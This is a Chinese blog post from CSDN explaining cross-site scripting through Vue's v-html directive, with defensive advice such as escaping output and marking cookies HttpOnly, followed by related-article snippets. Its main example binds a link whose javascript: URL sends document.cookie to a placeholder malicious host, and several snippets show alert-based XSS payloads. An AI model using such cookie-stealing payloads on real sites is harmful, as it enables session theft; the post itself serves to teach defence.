XSS攻击与v-html

最新推荐文章于 2023-12-28 10:52:45 发布
最新推荐文章于 2023-12-28 10:52:45 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: NODE.JS与VUE专题 文章标签: XSS CSRF V-html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tswang6503/article/details/119075748
版权

      XSS(cross site script)攻击,利用用户web输入漏洞,实现跨站脚本攻击。恶意攻击者在Web页面里插入恶意html代码,当用户浏览该页时,嵌入其中的恶意html代码被执行,从而实现攻击者的恶意目的。V-html通过过滤输入和转义输出可以有效避免该类攻击。

      一、攻击方式

      示例代码:

      <div id="app">

            <div v-html="myhtml"></div>

      </div>

      <script>

           new Vue ({

                el:"app",

                 data:{

                  myhtml:"<a href=javascript:location.href='http://恶意网址?cookie='+document.cookie> 

                  你喜欢的文字</a>"

                   }

              })

     </script>

     上述代码执行后,用户一旦点击“你喜欢的文字”这个链接,即会访问相应的恶意网址并提交一个cookie(很可能包含了你的登录用户名与密码)。

     类似的现象出现在留言板、评论等诸多用户输入并提交的区域。主要风险:

     在代码区里有用户输入的内容,允许用户输入HTML标签的页面等。

      二、解决办法(防止XSS和CSRF)

      1. 前端过滤:零信任用户输入的内容,不要用v-html绑定任何用户输入的内容;不要直接相信服务器返回的响应;对所有用户提交内容进行可靠的输入验证,提交内容包括URL、查询关键字、http头、post数据等;

      2.后台转义(<> &lt;&gt;):不能直接相信前端获得的用户输入信息,当用户输入内容含有标签时不解释,直接输出。严格控制输入字符数,拒绝脚本区的用户输入。  

      3.给cookie加上属性http

      有关CSRF(跨站点请求伪造Cross—Site Request Forgery)的内容请参考文章:

    CSRF攻击与防御


                

        

        

    




    

      

        

            

              
                
                  tswang6503
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    1
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
处理v-html存在的xss攻击

				
			

			

				

					lin5508的博客
				

				

					04-09
					
					327
					
				

			

		

		

			
				
处理v-html存在的xss攻击
处理v-html存在的xss攻击
<div v-html='$xss(test)'></div>




			
		

	



                

              
                



	

		

			

				
					
解决v-html指令潜在的xss攻击

					
热门推荐

				
			

			

				

					lingxiaoxi_ling的博客
				

				

					04-29
					
					1万+
					
				

			

		

		

			
				
我们首先来看一个例子

运行之后由于src地址对应的资源找不到,会触发img标签的error事件,最终alert弹框。这便是一个最简单的xss攻击html指令的运行原理
v-html指令源码
// /vue/src/platforms/web/compiler/directives/html.js
export default function html (el: ASTElement, di...

			
		

	



                


  
              

                


	

		

			

				
					
攻击html页面,v-htmlXSS 攻击

				
			

			

				

					weixin_36073959的博客
				

				

					06-08
					
					1271
					
				

			

		

		

			
				
在 Vue 中有 v-html 这个便利的指令,可以让我们直接输出 HTML,但它有个缺点。Vue 官网这样解释这个「指令」双大括号会将数据解释为普通文本,而非 HTML 代码。为了输出真正的 HTML,你需要使用 v-html 指令:Using mustaches: {{ rawHtml }}Using v-html directive: 输出代码:Using mustaches: This s...

			
		

	





	

		

			

				
					
xss攻击 html代码,v-htmlXSS 攻击

				
			

			

				

					weixin_35691102的博客
				

				

					06-07
					
					633
					
				

			

		

		

			
				
在 Vue 中有 v-html 这个便利的指令,可以让我们直接输出 HTML,但它有个缺点。Vue 官网这样解释这个「指令」双大括号会将数据解释为普通文本,而非 HTML 代码。为了输出真正的 HTML,你需要使用 v-html 指令:Using mustaches: {{ rawHtml }}Using v-html directive: 输出代码:Using mustaches: This s...

			
		

	



		

			
		



	

		

			

				
					
解决v-html可能存在XSS漏洞风险

					
最新发布

				
			

			

				

					CYL_2021的博客
				

				

					12-28
					
					1019
					
				

			

		

		

			
				
解决v-html可能存在XSS漏洞风险

			
		

	





	

		

			

				
					
vue.js使用v-pre与v-html输出HTML操作示例

				
			

			

				

					10-18
				

			

		

		

			
				
因为直接插入HTML可能存在XSS(跨站脚本攻击)的风险。如果你的数据来自不可信的源,务必先对内容进行安全过滤或使用DOMPurify等库进行清洗,以防止恶意代码注入。  ### 总结  Vue.js 的 `v-pre` 和 `v-html` 提供了...

			
		

	





	

		

			

				
					
第十节 xss filter过滤器-01

				
			

			

				

					09-15
				

			

		

		

			
				
该函数可以将用户输入的数据中的特殊字符转换为 HTML 实体,从而防止 XSS 攻击。  例如,如果用户输入 `,htmlspecialchars() 函数将其转换为 `<`。这样,可以防止攻击者 inject 恶意脚本。  2. htmlentities() ...

			
		

	





	

		

			

				
					
vue通过v-html指令渲染的富文本无法修改样式的解决方案

				
			

			

				

					10-15
				

			

		

		

			
				
 - 考虑使用更安全的富文本解析库,如`sanitize-html`或` DOMPurify`,来过滤和清理插入的HTML,防止XSS攻击。  - 使用`v-bind`指令与富文本数据结合,例如`v-bind:class`和`v-bind:style`,可以更直接地控制动态...

			
		

	





	

		

			

				
					
XSS 小助手 V1.0 -XSS一定要用到的小工具必备

				
			

			

				

					05-03
				

			

		

		

			
				
XSS小助手 V1.0 - XSS攻击与防御详解】  XSS(Cross-Site Scripting,跨站脚本)是一种常见的网络安全漏洞,攻击者利用该漏洞在网页中注入恶意脚本,使得用户在访问受感染页面时执行这些脚本,从而窃取用户的敏感...

			
		

	





	

		

			

				
					
Tiny-XSS-scanner-v1.0:由于Google引擎已更改,因此2009年代码现在需要重新编写

				
			

			

				

					05-24
				

			

		

		

			
				
在网络安全领域,跨站脚本(XSS)攻击是一种常见的威胁,它允许攻击者通过注入恶意脚本到网页上,来窃取用户的敏感信息或者执行其他恶意操作。Tiny-XSS-scanner-v1.0是一个专门用于检测此类漏洞的工具,由Visual ...

			
		

	





	

		

			

				
					
HtmlSanitizer:清除HTML以避免XSS攻击

				
			

			

				

					02-03
				

			

		

		

			
				
HtmlSanitizer
 HtmlSanitizer是一个.NET库,用于从构造中清除可能导致HTML片段和文档。 它使用来解析,操纵和呈现HTML和CSS。
 由于HtmlSanitizer基于强大HTML解析器,因此它还可以使您避免故意或意外的“标签中毒”,在该情况下,一个片段中的无效HTML可以破坏整个文档,从而导致布局或样式损坏。
 为了方便不同的用例,可以在几个级别上自定义HtmlSanitizer:
 通过属性AllowedTags配置允许HTML标签。 所有其他标签将被剥离。
 通过属性AllowedAttributes配置允许HTML属性。 所有其他属性将被剥离。
 通过属

			
		

	





	

		

			

				
					
Vue中v-html引起xss攻击(防止script注入)

				
			

			

				

					meimeib的博客
				

				

					07-16
					
					2971
					
				

			

		

		

			
				
v-html引起xss攻击场景
<div v-html="html"></html>
data(){
	return {
		html:'alert('1')'
	}
}

解决办法
1. 下载 xss 依赖
npm install xss --save

2. main.js中引入xss包并挂载到vue原型上
import xss from "xss";
Vue.prototype.xss = xss;

3. 在vue.config.js中覆写html指令
chainWebpac

			
		

	





	

		

			

				
					
vue中使用v-html防止xss注入

				
			

			

				

					aGreetSmile的博客
				

				

					06-25
					
					1955
					
				

			

		

		

			
				
通常我们处理xss攻击会使用一个xss的npm包来过滤xss攻击代码。所以我们要做的就是给指令的value包上一层xss函数。这样我们就能覆盖html指令。这样我们就从源头解决了html指令存在的潜在xss攻击。3.在vue.config.js中覆写html指令。2.引入xss包并挂载到vue原型上。解决html指令存在的xss漏洞问题。

			
		

	





	

		

			

				
					
vue项目 v-html存在植入xss攻击怎么解决

				
			

			

				

					zhaoletf的博客
				

				

					03-23
					
					1万+
					
				

			

		

		

			
				
然后在需要使用v-html的页面,将v-html改为 v-dompurify-html即可解决xss攻击问题.但是这样写的话也是比较麻烦的,如果这个项目已经做的很大了,在一个个的去改,这样费事费力,还不易于后期开发的维护.当人员离职入职的时候容易造成交接不到位的问题.


...

			
		

	





	

		

			

				
					
vue中使用v-html如何避免xss攻击??

				
			

			

				

					yang_song97的博客
				

				

					05-17
					
					1184
					
				

			

		

		

			
				
有时候后端返回的数据是这样的这时我们想到使用vue指令v-html实现,但是这样会有问题,如何防止跨站点脚本(XSS)攻击?这里我们借助插件vue-dompurify-html来实现,直接上代码。

			
		

	





	

		

			

				
					
vue项目:解决v-html可能带来的XSS是跨站脚本攻击

				
			

			

				

					snowball的博客
				

				

					12-27
					
					4109
					
				

			

		

		

			
				
一、项目简介

vue开发,nuxt项目

二、问题简述

当使用v-html时,出现提示如图:



三、解决问题

3.1、方案

使用vue-dompurify-html代替v-html

3.2、安装


yarn add vue-dompurify-html


3.3、plugins下创建vueInject.js (名字自己取)


import VueDOMPurifyHTML from 'vue-dompurify-html'
import Vue from 'vue'
Vue.use(V.

			
		

	





	

		

			

				
					
v-html指令怎么防止XSS注入

				
			

			

				

					qq_52845451的博客
				

				

					09-06
					
					1820
					
				

			

		

		

			
				
v-html怎么防止xss注入

			
		

	





	

		

			

				
					
处理v-html的潜在XSS风险

				
			

			

				

					lj1530562965的博客
				

				

					09-25
					
					1619
					
				

			

		

		

			
				
没有进行防止xss攻击的例子
<p v-html="test"></p>
 
export default {
  data () {
    return {
      test: `<a οnclick='alert("xss攻击")'>链接</a>`
    }
}


结果,js事件被执行,弹出弹框,我们要杜绝这种情况,保留a标签,拦截onclick事件
解决办法
法一:
使用一个xss的npm包来过滤xss攻击代码,给指令的value包上一层xss

			
		

	





	

		

			

				
					
解决vue v-html xss问题

				
			

			

				

					qq_28084837的博客
				

				

					09-02
					
					1116
					
				

			

		

		

			
				
问题描述:

vue中使用指令 v-html 会存在xss攻击问题


<template>
    <div v-html="html"></div>
</template>

<script>
    export default {
        data () {
            return {
              html: `<a οnclick='alert(123123)'>点我alert</a

			
		

	





	

		

			

				
					
v-text与v-html的区别

				
			

			

				

					04-17
				

			

		

		

			
				
v-text和v-html都是Vue.js中的指令,但是它们的作用不同。...但是由于v-html可以渲染任意的HTML代码,使用不当可能会导致XSS攻击。  因此,在大多数情况下应该使用v-text指令,仅当需要渲染富文本时才使用v-html指令。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
tswang6503

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值